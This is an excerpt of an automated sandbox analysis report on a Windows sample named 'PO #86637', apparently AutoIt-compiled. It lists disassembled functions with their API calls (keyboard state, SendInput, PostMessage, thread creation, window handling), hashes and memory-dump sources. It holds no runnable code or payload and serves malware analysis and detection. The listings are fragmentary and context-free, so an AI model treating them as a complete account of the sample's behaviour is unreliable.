                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                      APIs
                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLastselect
                      • String ID:
                      • API String ID: 215497628-0
                      • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                      • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                      APIs
                      • GetParent.USER32(?), ref: 0044443B
                      • GetKeyboardState.USER32(?), ref: 00444450
                      • SetKeyboardState.USER32(?), ref: 004444A4
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                      APIs
                      • GetParent.USER32(?), ref: 00444633
                      • GetKeyboardState.USER32(?), ref: 00444648
                      • SetKeyboardState.USER32(?), ref: 0044469C
                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __snwprintf__wcsicoll_wcscpy
                      • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                      • API String ID: 1729044348-3025626884
                      • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                      • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                      • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                      • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                      APIs
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                      • String ID:
                      • API String ID: 2354583917-0
                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                      APIs
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Enable$Show$MessageMoveSend
                      • String ID:
                      • API String ID: 896007046-0
                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                      APIs
                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                      • GetFocus.USER32 ref: 00448ACF
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Enable$Show$FocusMessageSend
                      • String ID:
                      • API String ID: 3429747543-0
                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                      APIs
                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                      • String ID:
                      • API String ID: 3300667738-0
                      • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                      • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                      • __swprintf.LIBCMT ref: 0045D4E9
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu$\VH
                      • API String ID: 3164766367-2432546070
                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                      APIs
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Msctls_Progress32
                      • API String ID: 3850602802-3636473452
                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                      • String ID:
                      • API String ID: 3985565216-0
                      • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                      • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                      • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                      • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                      APIs
                      • _malloc.LIBCMT ref: 0041F707
                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                      • _free.LIBCMT ref: 0041F71A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AllocateHeap_free_malloc
                      • String ID: [B
                      • API String ID: 1020059152-632041663
                      • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                      • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                      • __calloc_crt.LIBCMT ref: 00413DB0
                      • __getptd.LIBCMT ref: 00413DBD
                      • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                      • _free.LIBCMT ref: 00413E07
                      • __dosmaperr.LIBCMT ref: 00413E12
                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                      Similarity
                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                      • String ID:
                      • API String ID: 155776804-0
                      APIs
                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      APIs
                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                      • ExitThread.KERNEL32 ref: 00413D4E
                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                      • __freefls@4.LIBCMT ref: 00413D74
                      Similarity
                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                      • String ID:
                      • API String ID: 259663610-0
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004302E6
                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                      • GetClientRect.USER32(?,?), ref: 00430364
                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                      • GetWindowRect.USER32(?,?), ref: 004303C3
                      • ScreenToClient.USER32(?,?), ref: 004303EC
                      Similarity
                      • API ID: Rect$Client$Window$MetricsScreenSystem
                      • String ID:
                      • API String ID: 3220332590-0
                      Similarity
                      • API ID: _malloc_wcslen$_strcat_wcscpy
                      • String ID:
                      • API String ID: 1612042205-0
                      Similarity
                      • API ID: _memmove_strncmp
                      • String ID: >$U$\
                      • API String ID: 2666721431-237099441
                      APIs
                      • GetKeyboardState.USER32(?), ref: 0044C570
                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                      Similarity
                      • API ID: MessagePost$KeyboardState$InputSend
                      • String ID:
                      • API String ID: 2221674350-0
                      Similarity
                      • API ID: _wcscpy$_wcscat
                      • String ID:
                      • API String ID: 2037614760-0
                      APIs
                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                      • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                      • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                      • VariantClear.OLEAUT32(?), ref: 00451CA1
                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                      Similarity
                      • API ID: Variant$Copy$AllocClearErrorLastString
                      • String ID:
                      • API String ID: 960795272-0
                      APIs
                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                      • EndPaint.USER32(?,?), ref: 00447D13
                      Similarity
                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                      • String ID:
                      • API String ID: 4189319755-0
                      APIs
                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                      Similarity
                      • API ID: MessageSend$LongWindow$InvalidateRect
                      • String ID:
                      • API String ID: 1976402638-0
                      APIs
                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      Similarity
                      • API ID: Variant$Copy$ClearErrorLast
                      • String ID: NULL Pointer assignment$Not an Object type
                      • API String ID: 2487901850-572801152
                      APIs
                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                      Similarity
                      • API ID: Window$Enable$Show$MessageSend
                      • String ID:
                      • API String ID: 1871949834-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                      APIs
                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                      • SendMessageW.USER32 ref: 00471AE3
                      • DestroyIcon.USER32(?), ref: 00471AF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                      • String ID:
                      • API String ID: 3611059338-0
                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DestroyWindow$DeleteObject$IconMove
                      • String ID:
                      • API String ID: 1640429340-0
                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                      APIs
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • _wcslen.LIBCMT ref: 004438CD
                      • _wcslen.LIBCMT ref: 004438E6
                      • _wcstok.LIBCMT ref: 004438F8
                      • _wcslen.LIBCMT ref: 0044390C
                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                      • _wcstok.LIBCMT ref: 00443931
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                      • String ID:
                      • API String ID: 3632110297-0
                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
